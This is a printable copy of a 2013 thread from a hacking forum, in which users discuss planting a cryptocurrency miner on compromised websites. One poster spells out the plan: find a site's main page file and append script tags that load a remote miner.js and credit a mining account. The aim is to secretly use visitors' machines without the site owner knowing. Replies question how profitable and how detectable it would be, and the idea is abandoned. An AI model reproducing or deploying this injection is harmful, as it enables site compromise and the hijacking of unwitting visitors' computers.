Sinisterly
Money 4 Hack - Mining bitcoins from hacked sites - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Money 4 Hack - Mining bitcoins from hacked sites (/Thread-Money-4-Hack-Mining-bitcoins-from-hacked-sites)

Money 4 Hack - Mining bitcoins from hacked sites - 3SidedSquare - 01-22-2013

While pursuing the internet, I came across this little site:
http://www.bitcoinplus.com
More specifically, this page:
http://www.bitcoinplus.com/miner/embeddable

So I had this crazy idea to create a shell that would automatically add script to the front page of a website to start bitcoin mining, while leaving everything else untouched (hopefully not noticed).

Thoughts?

RE: Money 4 Hack - Mining bitcoins from hacked sites - Phytrix - 01-22-2013

That's a good idea. Can you shell it though?

RE: Money 4 Hack - Mining bitcoins from hacked sites - 3SidedSquare - 01-22-2013

I don't see why not, assuming the server is running apache,
  • look for main.*
  • Insert
    Code:
    <HTML><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script>
    <script src="http://www.bitcoinplus.com/js/miner.js" type="text/javascript"></script>
    <script type="text/javascript">BitcoinPlusMiner("donny@bitcoinplus.com", {toVisitor: 30})</script></HTML>
    to the end of the file.
How hard can it be?

RE: Money 4 Hack - Mining bitcoins from hacked sites - w00t - 01-22-2013

For one, you won't likely get much money from it, java isn't known for it's speed, and it'll only be active as long as the page is up.

The user also has to approve a java applet running, which most people won't do if they don't see a reason to.

RE: Money 4 Hack - Mining bitcoins from hacked sites - 3SidedSquare - 01-22-2013

Alright, fair enough, but still better than a deface page.

Besides, if a user goes to a site often, he's likely to allow it to run java, no?

RE: Money 4 Hack - Mining bitcoins from hacked sites - pac - 01-22-2013

IMO, depends how stupid he is. Every people that know what JDB is will report the "flaw" to site administrator. I've tried to do it on my blog and my site got blacklisted from google for malware distribution. Sad

RE: Money 4 Hack - Mining bitcoins from hacked sites - Phytrix - 01-22-2013

(01-22-2013, 07:20 AM)3SidedSquare Wrote: Alright, fair enough, but still better than a deface page.

Besides, if a user goes to a site often, he's likely to allow it to run java, no?

If a user goes to a site often, he's probably likely to be suspicious when it asks to run Java.

RE: Money 4 Hack - Mining bitcoins from hacked sites - 3SidedSquare - 01-23-2013

I suppose it's not worth pursuing, thanks for the brainpower, and happy hacking.